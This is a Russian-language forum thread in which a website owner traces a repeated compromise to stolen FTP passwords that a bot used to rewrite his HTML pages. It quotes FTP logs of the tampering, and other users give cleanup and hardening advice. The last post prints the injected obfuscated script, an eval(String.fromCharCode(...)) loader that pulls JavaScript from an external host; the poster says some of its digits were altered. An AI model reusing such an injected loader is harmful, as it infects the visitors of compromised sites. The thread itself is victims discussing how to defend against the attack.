shipix service
  • Добро пожаловать на форум умных покупателей! Присоединяйтесь к нашей уютной компании и участвуйте в обсуждениях – Регистрация

Взлом сервака или как у кого бывает?

  • Автор темы oookuchaooo
  • Дата начала
oookuchaooo

oookuchaooo

Посредник
Регистрация
18 Авг 2008
Сообщения
1 491
Баллы
1 063
Местоположение
Москва
Здравствуйте уважаемые форумчане, поделитесь советами,
ну ничего понять не могу.

Да, было дело 3 раза винду переустанавливал. Стирал со всеми небалуйсями.

И вдруг, ни с того ни с сего, опять зараза на компе. Особых проявлений - нет. Но чую она тут, рядом.

Последнее подозрение пало на сервак. Там явные не лады.

Перезагруз полный сервака - делал. Проверялся. Болячек - нет..

Опаньки, через два дня - опять не понятные штуковины тама и потом тута на компе.

По скольку, я человек в этом плане , совсем не понимающий, отписал программистам, что тама да как , как там дела на этом фронте.
Говорят, совсем - худо. ftp пароли - тырят и по полной программе.

НИЗЯ - сохранять, в клиенте пароли. А я вот дурак, всегда так делал.

И логины прислали, хрен разберешь, что да к чему.
Суть проблемы, скачивают файл html и обратно вирусняковый закачивают и так много разных.

IP - не мое. Как туда - то вирусы попадают?


Apr 1 11:42:47 s57 pure-ftpd: (oootubes@189.104.161.125) [NOTICE] /home/oootubes//tmp/webalizerftp/usage_201002.html uploaded (76728 bytes, 24.78KB/sec)
Apr 1 11:42:52 s57 pure-ftpd: (oootubes@189.104.161.125) [NOTICE] /home/oootubes//tmp/webalizerftp/usage_201003.html downloaded (87583 bytes, 62.90KB/sec)
Apr 1 11:42:58 s57 pure-ftpd: (oootubes@189.104.161.125) [NOTICE] /home/oootubes//tmp/webalizerftp/usage_201003.html uploaded (87584 bytes, 22.44KB/sec)
Apr 1 11:43:04 s57 pure-ftpd: (oootubes@189.104.161.125) [NOTICE] /home/oootubes//нАПЮГЖШ_ОХЯЕЛ_ДКеБПНОШ/1/German-Partner ЮСЙЖХНМ eBay - ОНКМШИ ЯОЕЙРП СЯКСЦ ДКЪ ОНЙСОЮРЕКЕИ Х ОПНДЮБЖНБ нАПЮГЖШ ОХЯЕЛ.htm downloaded (27140 bytes, 1004.05KB/sec)
Apr 1 11:43:08 s57 pure-ftpd: (oootubes@189.104.161.125) [NOTICE] /home/oootubes//нАПЮГЖШ_ОХЯЕЛ_ДКеБПНОШ/1/German-Partner ЮСЙЖХНМ eBay - ОНКМШИ ЯОЕЙРП СЯКСЦ ДКЪ ОНЙСОЮРЕКЕИ Х ОПНДЮБЖНБ нАПЮГЖШ ОХЯЕЛ.htm uploaded (27141 bytes, 20.30KB/sec)
Apr 1 11:45:55 s57 pure-ftpd: (oootubes@189.104.161.125) [NOTICE] /home/oootubes//public_html/tubes/6R3S-1/6P3C-1, 6R3S-1.htm downloaded (5017 bytes, 307.56KB/sec)
Apr 1 11:45:59 s57 pure-ftpd: (oootubes@189.104.161.125) [NOTICE] /home/oootubes//public_html/tubes/6R3S-1/6P3C-1, 6R3S-1.htm uploaded (5017 bytes, 1.55KB/sec)
Apr 1 11:48:13 s57 pure-ftpd: (oootubes@189.104.161.125) [INFO] Logout.
 
A

aresstokrat

Новичок
Регистрация
20 Апр 2007
Сообщения
161
Баллы
0
себе на комп ставь касперского (по моему опыту нод32, симантек корпорейт, дрвеб не все ловит)
сканишь себя, чистишь

далее меняй пароли на фтп на сложные 16симв генери с помощью passwgen

далее - прийдется вычистить все файлы на ftp в которых есть вирус - да, к сожалению вот такой геморрой

самое простое решение в данном вопросе, подсмотреть какие строчки он подставляет в этих файлах и с помощью любой программы позволяющий сделать "Find & Replace" сделать это, заменить строчки на пустоту, знак пробела.

я делал с помощью Dreamweaver, у него есть функция заменить во всех файлах проекта (предварительно весь сайт к себе на комп надо скачать)
 
@ndy$

@ndy$

Модератор
Регистрация
1 Фев 2009
Сообщения
18 867
Баллы
1 973
Местоположение
Россия, Сибирь, рудники
aresstokrat сказал(а):
самое простое решение в данном вопросе, подсмотреть какие строчки он подставляет в этих файлах и с помощью любой программы позволяющий сделать "Find & Replace" сделать это, заменить строчки на пустоту, знак пробела.
Нажмите, чтобы раскрыть...
oookuchaooo
Скорее всего редирект на "кривое" зеркало Вашей странички...
Соответственно, все это вообще - Статья 272 УК РФ "Неправомерный доступ к компьютерной информации"... Делайте выводы. Чем заниматься чисткой несуществующих "вирусов", может лучше сразу заняться теми, кому так нужна Ваша инфа?..

HackZone.RU - Территория взлома. Защита от взлома. Безопасность в сети

HackZone.RU - Cтать хакером, взломать пароль, взломать сайт, взломать ящик, взломать почту, программы для взлома, взломать icq, взломать mail, хакер, стать хакером,xss
www.fssr.ru www.fssr.ru
 
A

aresstokrat

Новичок
Регистрация
20 Апр 2007
Сообщения
161
Баллы
0
Да ерунда это все, делает это бот. Все происходит автоматически, инфа эта никому не нужна (нужна зараженная машина для ддоса и зараженный сайт, если доступ к нему прописат в фтп клиентах, что бы клипать еще больше зараженных машин). На страницы вписывается код <ифрейм> который на бэкграунде редиректит пользователя в место где он заражается.
 
@ndy$

@ndy$

Модератор
Регистрация
1 Фев 2009
Сообщения
18 867
Баллы
1 973
Местоположение
Россия, Сибирь, рудники
aresstokrat сказал(а):
Все происходит автоматически, инфа эта никому не нужна (нужна зараженная машина для ддоса и зараженный сайт
Нажмите, чтобы раскрыть...
А что DDоS и подставные сайты у нас существуют сами по себе и, более того, официально разрешены действующим законодательством? Это хорошо, конечно, что (и если) данный взлом осуществлен "в тупую", для использования в третьих целях и инфой просто никто не интересовался... Но ведь может быть и по другому. Так и потеряем "проверенного посредника", а приобретем "злую подставу"... Помните, как у NJA Business номер аськи угнали?..

Кстати, а что за настройки на сервере, где юзерам позволено изменять содержимое?.. Или, угнан админский пасс?..
 
oookuchaooo

oookuchaooo

Посредник
Регистрация
18 Авг 2008
Сообщения
1 491
Баллы
1 063
Местоположение
Москва
aresstokrat, не получается , как вы говорите.
Точнее, не знаю, как это изменить.
Я много удалил, поменял все. И все работает без вирусов - нормалек.
Остались html , которые статистику показывают, я их удалить не могу.
Так как, новых таких файлов нету. Как оттуда поганый код убрать не знаю.

Dreamweaver - скачал. Загружаю туда поганый файл, ну и ни чего не вижу.

Пароль - сменил на длинный пре длинный. Больше их нигде не храню.

Все работает 2 дня. Проблем нет.
Как те файлы , оставшиеся излечить? Могу удалить и все. Мне без разницы. Главное, чтоб сайт - жил.
 
A

aratj

Новичок
Регистрация
7 Сен 2009
Сообщения
352
Баллы
0
Местоположение
Moscow
наверное лучшее решение уходить от голово HTML ?
 
P

Paladin

Новичок
Регистрация
25 Апр 2009
Сообщения
2 392
Баллы
0
Местоположение
Россия
Скорее всего к вам на ПК используя дырку Windows или через зараженный сайт попал троян. Украсть пароль с ПК в этом случае проще простого, в вашем случае пароль просто хранился в файле. Длинные пароли тут не спасут. После получения пароля от ftp злоумышленник получил права на доступ к вашему сайту и загрузил туда вредоносную страничку... Теперь тех "счастливчиков", которые попадут на ваш сайт, ждет ваша участь.
Используйте Opera (браузер с наименьшим числом дырок и, к тому же, малопопулярный), последние обновления Windows и через фаерволл запретите какой либо входящий и исходящий трафик через неиспользуемые порты... или утсановите второй системой Linux и выходите в Интернет через него.

P. S. Вы держите сервер на Windows? %)
 
BigDad

BigDad

Модератор
Регистрация
4 Фев 2009
Сообщения
12 923
Баллы
1 898
Местоположение
Vologda
oookuchaooo

oookuchaooo

Посредник
Регистрация
18 Авг 2008
Сообщения
1 491
Баллы
1 063
Местоположение
Москва
Да не, не . Теперь все тихо уже который день.
Каспера поставил, пароли поменял.
Так, переодически пакеты чтоль пытаются заслать :)
06.04.2010 1:43:43 Обнаружено: Intrusion.Win.MSSQL.worm.Helkern, UDP от 200.111.128.11 на локальный порт 1434

Программисты и некоторые товарищи в этой ветки были правы:
Видать бот - спер пароль из ftp клиента и атоматом, переодически менял тама html файлы.
Так как я их изменял на нормальные. А они, через некоторое время - опять в ненормальные превращались :)
А инфу, хотели бы стырить, стырили.
По логам видно, что подмен html.
Причем четко за одну секунду снова добавляется и файл на 1 байт больше:

Mar 29 20:52:38 s57 pure-ftpd: (oootubes@118.172.70.180) [NOTICE] /home/oootubes//public_html/index.html downloaded (1544 bytes, 27388.13KB/sec)
Mar 29 20:52:39 s57 pure-ftpd: (oootubes@118.172.70.180) [NOTICE] /home/oootubes//public_html/index.html uploaded (1545 bytes, 2.49KB/sec)
 
C

caver

Новичок
Регистрация
17 Сен 2008
Сообщения
191
Баллы
0
Местоположение
Томск
Mar 29 20:52:38 s57 pure-ftpd: (oootubes@118.172.70.180) [NOTICE] /home/oootubes//public_html/index.html downloaded (1544 bytes, 27388.13KB/sec)
Mar 29 20:52:39 s57 pure-ftpd: (oootubes@118.172.70.180) [NOTICE] /home/oootubes//public_html/index.html uploaded (1545 bytes, 2.49KB/sec)
Нажмите, чтобы раскрыть...
Контроль, что есть доступ или апдейт вредоносного кода

Поинтересуйся у хрюнделей на хостинге насчет sftp
Если есть - то все просто замечательно,
ssh + ключики
...
Profit !!! :shock:
 
oookuchaooo

oookuchaooo

Посредник
Регистрация
18 Авг 2008
Сообщения
1 491
Баллы
1 063
Местоположение
Москва
aresstokrat, добил таки :fool:

Вот он гаденыш! (некоторые цифры поменял, дабы не распространить заразу)

<kJNPAGyUfwlpmhli1o6kENwBUZTINEoUZ5KH6vuxrkQU5><script>eval(String.fromCharCode
(103,117,110,99,116,105,111,110,32,105,106,115,40,41,123,116,114,121,
123,118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101
97,116,101,114,106,101,109,101,110,116,40,34,115,99,114,105,112,116,
34,41,59,115,46,115,101,116,65,116,116,114,105,98,117,116,101,40,34,
115,114,99,34,44,34,104,116,116,112,58,11,47,106,107,104,116,101,113,
97,46,66,111,109,58,51,23,50,57,47,106,115,34,42,59,100,111,99,117,
109,101,110,116,46,98,111,114,121,46,97,112,112,101,110,100,67,104,
105,108,100,40,115,41,55,99,97,116,99,89,40,101,41,123,25,125,
115,101,116,84,105,109,101,111,117,116,40,34,108,106,115,40,41,34,
44,53,48,48,41,59));</script></kJNPAGyUfwlpmhli1o6kENwBUZTINEoUZ5KH6vuxrkQU5>
 
Вам необходимо войти или зарегистрироваться, чтобы здесь отвечать.
Live

Вверх
Live